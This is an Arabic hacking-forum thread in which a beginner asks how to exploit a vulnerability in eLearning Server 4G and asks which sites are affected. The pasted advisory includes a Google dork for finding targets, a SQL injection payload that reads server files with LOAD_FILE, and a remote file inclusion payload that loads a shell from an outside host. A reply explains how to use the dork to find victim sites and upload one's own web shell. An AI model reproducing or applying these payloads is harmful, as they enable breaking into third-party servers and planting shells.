![]() |
كيف استغل هذه الثغره؟ ارجوا المساعده السلام عليكم ايها الاحبه لي الشرف ان اكون بينكم وقد تعلمت الكثير في هذه الفتره القصيره من بدايتي لدي سؤال وارجو من اهل الخبره المساعده هذا هو الدورك الجديد للثغره الجديده كيف ممكن استغلها اريد شرح بالصور واي موقع مصاب بهذه الثغره حتى تعم الفائده للجميع http://cxsecurity.com/issue/WLB-2012050086# Exploit Title: eLearning Server Multiple Remote Vulnerabilities # Google Dork: intitle:"eLearning Server" # Date: 10.05.2012 # Author: Eugene Salov, Andrey Komarov (Group-IB, http://group-ib.ru) # Software Link: http://www.hypermethod.ru/ # Version: 4G # Tested on: Microsoft Windows news.php4 "nid" SQL injection: POC: /news.php4?nid=-12'+union+select+1,2,LOAD_FILE('C:\\Program%20File s\\Hypermethod\\eLearningServer\\index.php'),4,5,6 ,7,8 ,9,10,11/* admin/setup.inc.php Remote file Include POC: /admin/setup.inc.php?path=http://group-ib.ru/shell.txt? |
رد: كيف استغل هذه الثغره؟ ارجوا المساعده اقتباس:
حبيبى الثغرة هذه من نوع SQL وهو يسمى بحقن قواعد البيانات إذا لم تكن لديك خلفية او معرفة حول هذا النوع ابحث فى اسام المنتدى ستجد قسم خاص ملىء بالشروحات المختصة بهذا القسم إذا كانت لك خلفية حول هذه الثغرة فإليك شرح الثغرة الثغرة تطبق على الاصدار الرابع من PHP المواقع المصابة ،،،والدورك هو كود البحث عن هذه المواقع فى محركات البحث ،،،كود الاستغلال الموجود يمكنك من رفع الشيل الخاص بك بسهولة بعد لصقه بعد عنوان الموقع ثم بعدها تضع علامة = وتضع رابط الشيل الخاص بك وكما هو مكتوب تم اختباره على سيرفر من نوع وندوز |
رد: كيف استغل هذه الثغره؟ ارجوا المساعده رحم الله والديك ايها المكرم بارك الله فيك وفي مسعاك ورحم الله والديك |
رد: كيف استغل هذه الثغره؟ ارجوا المساعده اقتباس:
نورت حبيبى وهذا رابط القسم المختص http://www.vbspiders.com/vb/f133.html والله ان هذا الرد عندى من أفضل الردود جزاك الله خيرا على الدعوة ونتمنى ان يرزقنا الله نحن واياكم |
الساعة الآن 12:59 PM |
[ vBspiders.Com Network ]